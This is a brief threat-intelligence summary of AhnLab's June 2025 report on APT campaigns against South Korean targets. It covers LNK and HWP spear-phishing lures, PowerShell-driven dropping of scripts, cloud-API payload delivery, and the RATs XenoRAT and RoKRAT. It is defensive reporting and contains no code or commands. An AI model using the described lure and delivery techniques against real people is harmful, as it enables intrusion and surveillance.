AhnLab’s June 2025 domestic APT monitoring found spear phishing remained the dominant intrusion method against South Korean targets, with LNK-based delivery accounting for the largest share and HWP-based attacks increasing from the previous month. One observed LNK pattern used malicious PowerShell to extract embedded CAB and decoy document data, then unpacked bat, ps1, and vbs scripts that could collect PC information and download additional malware. Lures included cryptocurrency exchange account notices, bank transaction explanations, tax-related documents, crypto receipt forms, and resume-themed files. Another LNK-driven pattern delivered RAT malware through compressed archives containing normal decoy files, using Dropbox API or Google Drive to download payloads or create scripts and obfuscated RAT files under locations such as %PUBLIC%. The final RAT payloads included XenoRAT and RoKRAT and supported attacker-controlled actions such as keylogging and screen capture.